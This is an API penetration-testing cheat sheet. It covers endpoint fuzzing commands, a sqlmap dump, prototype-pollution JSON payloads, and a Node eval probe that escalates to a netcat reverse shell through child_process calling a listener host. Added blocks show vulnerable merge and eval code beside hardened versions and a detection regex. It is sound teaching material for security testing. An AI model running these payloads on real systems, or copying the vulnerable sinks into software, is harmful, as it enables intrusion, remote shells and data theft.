API Pentesting
Last modified: 2023-07-09
An Application Programming Interface (API) is an interface through which programs talk to each other. Common web-facing styles include Web APIs in general, REST/RESTful APIs, and SOAP services described by WSDL; most of the probes below apply to any of them.
Change Methods
# Methods (also send a made-up verb such as INVENTED to see how the server handles unknown methods)
GET, POST, PUT, DELETE, OPTIONS, HEAD, PATCH, INVENTED
Endpoint Discovery
Try to enumerate endpoints while changing the HTTP method (GET, POST, OPTIONS, etc.); an endpoint that returns 404 or 405 for GET may answer to POST or PUT.
# Response format switch (ask for XML output; relevant for XXE later)
/api/?xml
/api?xml
/api/v1?xml
/api/v1/user?xml
# Web Service Description Language
/api/?wsdl
# Versions
/api/v1/user
/api/v2/user
/api/v3/user
# Wildcards
/api/v2/user/*
/api/v2/user/posts/*
/api/v2/users/*
# Path traversal (also try URL-encoded variants such as ..%5c and ..%2f)
/api/v1/post/..\private
Automation
# Dirb
dirb https://vulnerable.com/ endpoints.txt
# Ffuf
ffuf -u https://vulnerable.com/FUZZ -w endpoints.txt
ffuf -u https://vulnerable.com/FUZZ -X POST -w endpoints.txt
# Fuzz endpoint names under /api
ffuf -u https://vulnerable.com/api/FUZZ -w wordlist.txt
# Fuzz query parameter names
ffuf -u https://example.com/api/?FUZZ=test -w wordlist.txt
# Gobuster
gobuster dir -u https://vulnerable.com/ -w endpoints.txt
# Kiterunner
# -A: Assetnote wordlist to use (here apiroutes-210228, limited to its first 20000 entries)
# -x: max connections per host (default: 3)
kr scan https://vulnerable.com/api -A=apiroutes-210228:20000 -x 10
kr scan https://vulnerable.com/api -A=apiroutes-210228:20000 -x 10 --fail-status-codes 401,404
kr scan https://vulnerable.com:8443/api -A=apiroutes-210228:20000 -x 10
A wordlist dedicated to API endpoints is useful here.
GET Parameters
/api/v1/user?id=test
/api/v1/user?name=test
/api/v1/user?uuid=test
/api/v1/status?live=test
/api/v1/status?verbose=test
Parameter Fuzzing
# Key (parameter name). -fs 120 filters out responses of the baseline size (here 120 bytes);
# measure the size of a response for an unknown parameter first and adjust the value.
ffuf -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt
ffuf -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt -fs 120
ffuf -X POST -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt
ffuf -X POST -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt -fs 120
# Value (parameter value for a known parameter name)
ffuf -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt
ffuf -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt -fs 120
ffuf -X POST -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt
ffuf -X POST -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt -fs 120
Sending Unexpected Data
We may be able to trigger unexpected behaviour (type confusion, mass assignment, prototype pollution) by sending unexpected data types in POST or PUT bodies instead of the expected string.
{"email": "test@test.com"}
{"email": true}
{"email": 1}
{"email": -1}
{"email": ["test@test.com", true]}
{"email": {"admin": true}}
// Prototype Pollution
{"email": "test@test.com", "__proto__": {"admin": true}}
{"email": {"__proto__": {"admin": true}}}
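Why the two prototype pollution payloads above matter, as an added example that is not part of the original page: a naive recursive "deep merge" (the kind many APIs use to merge a JSON body into a record) copies the "__proto__" key and thereby writes into Object.prototype, so every object in the process suddenly inherits an "admin" property. The merge functions, the signup handler and the role check are assumptions for illustration; the payloads are the ones listed above.

```javascript
// Added example (not from the original page). Shows a vulnerable recursive merge
// next to a hardened one, driven by the two __proto__ payloads from the list above.

// Vulnerable deep merge: trusts every key in the attacker-controlled source.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      // For key === "__proto__", target[key] resolves to Object.prototype, so the
      // recursive call below writes straight into the global prototype.
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened deep merge: refuses prototype-related keys and never descends into
// properties the target only inherits.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue; // drop the payload key entirely
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) ||
          target[key] === null || typeof target[key] !== 'object') {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hypothetical signup handler: merges the JSON body into a fresh user record, then
// checks an unrelated, freshly created object (e.g. a session) for an admin flag.
function processSignup(rawBody, merge) {
  const user = merge({ role: 'user' }, JSON.parse(rawBody));
  const unrelated = {};
  const userAdmin = user.admin === true;
  const unrelatedAdmin = unrelated.admin === true;
  delete Object.prototype.admin; // undo any pollution so the demo is repeatable
  return { userAdmin, unrelatedAdmin };
}

// Constructed attacker payloads, copied from the list above.
const PAYLOAD_TOP = '{"email": "test@test.com", "__proto__": {"admin": true}}';
const PAYLOAD_NESTED = '{"email": {"__proto__": {"admin": true}}}';

console.log('unsafe, top-level :', processSignup(PAYLOAD_TOP, unsafeMerge));
console.log('unsafe, nested    :', processSignup(PAYLOAD_NESTED, unsafeMerge));
console.log('safe,   top-level :', processSignup(PAYLOAD_TOP, safeMerge));
console.log('safe,   nested    :', processSignup(PAYLOAD_NESTED, safeMerge));
```

Run it with node; with unsafeMerge both payloads make the unrelated object report admin: true, with safeMerge neither does. The same check (reject "__proto__", "constructor" and "prototype" as keys, and only walk own properties) is what well-maintained merge libraries added when this class of bug was fixed in them.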
XSS
If we can send POST (or PUT) requests to API endpoints, we may be able to store payloads that are later reflected in responses.
If a browser renders those responses (directly or through a front-end that inserts them into the DOM), this can be exploited as XSS.
SQL Injection
sqlmap -u http://vulnerable.com/api/v2/fetch/?post=1 --dump --batch
Node.js Remote Code Execution (RCE)
If the website runs on Node (e.g. Express) and passes a parameter to eval() or a similar sink, we may be able to execute arbitrary JavaScript on the server.
# Get current working directory in the website
/api/?key=process.cwd()
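A minimal model of the sink behind the "/api/?key=process.cwd()" probe, as an added example that is not part of the original page: a handler that evaluates the "key" query parameter with eval() next to a hardened handler that resolves the same parameter through a fixed lookup table, plus a pattern a practitioner can use to spot such probes in request logs. The handler names, the parameter name and the allowlist entries are assumptions for illustration.

```javascript
// Added example (not from the original page). Vulnerable eval() sink vs. an
// allowlisted lookup, and a detection pattern for code-looking query values.

// Vulnerable: the attacker-controlled string reaches eval(), so
// ?key=process.cwd() or ?key=require('child_process').exec(...) runs as server-side JS.
function vulnerableKeyHandler(query) {
  // eslint-disable-next-line no-eval
  return String(eval(query.key));
}

// Hardened: the parameter only selects from predefined, side-effect-free lookups.
const ALLOWED_KEYS = {
  version: () => process.version,
  uptime: () => Math.floor(process.uptime()),
};

function safeKeyHandler(query) {
  const fn = Object.prototype.hasOwnProperty.call(ALLOWED_KEYS, query.key)
    ? ALLOWED_KEYS[query.key]
    : null; // hasOwnProperty also blocks keys like "__proto__" or "constructor"
  if (!fn) return { status: 400, body: 'unknown key' };
  return { status: 200, body: String(fn()) };
}

// Detection: does a query value look like a JavaScript expression rather than a
// plain identifier? Usable as a WAF rule or a log search for the probes above.
const CODE_PATTERN = /require\s*\(|process\.|child_process|\beval\b|\(\s*\)|`|\[\s*['"]/;
function looksLikeCode(value) {
  return CODE_PATTERN.test(String(value));
}

// Constructed probe values mirroring the section above (the second one is only
// pattern-matched here, never evaluated).
const PROBES = ['process.cwd()', "require('child_process').exec('id')", 'version'];

console.log('vulnerable handler:', vulnerableKeyHandler({ key: PROBES[0] }));
console.log('safe handler      :', safeKeyHandler({ key: PROBES[0] }));
for (const p of PROBES) console.log(`looksLikeCode(${JSON.stringify(p)}) =`, looksLikeCode(p));
```

Against the vulnerable handler the first probe returns the server's working directory, exactly what the "/api/?key=process.cwd()" request above tests for; the hardened handler answers 400 for anything that is not a known key name.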
Reverse Shell
We may be able to get a reverse shell through the "child_process" module.
First, start a listener on the local machine to catch the shell.
nc -lvnp 4444
Then send a request whose parameter spawns the reverse shell via child_process (URL-encode the payload when sending it in a real request; <local-ip> is the listener's address).
/api/?key=require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local-ip> 4444 >/tmp/f')
We should then see a shell in the local terminal.
Same Session Across Multiple Versions and Instances
For example, assume the website has two login endpoints, "/api/v1/user/login" and "/api/v2/user/login".
"v1" uses an "X-Token" header and "v2" uses an "X-Session" header.
After logging in to "v1", you may be able to access "v2" by sending the v1 token value in the v2 header, i.e. the two versions share one session store.
X-Token: fc38ab5f5ae41072778d852023f9ee26
X-Session: fc38ab5f5ae41072778d852023f9ee26
XXE
GET /api/product/1?xml HTTP/1.1
If the endpoint accepts or returns XML (e.g. with the ?xml switch above), we may be able to perform XXE.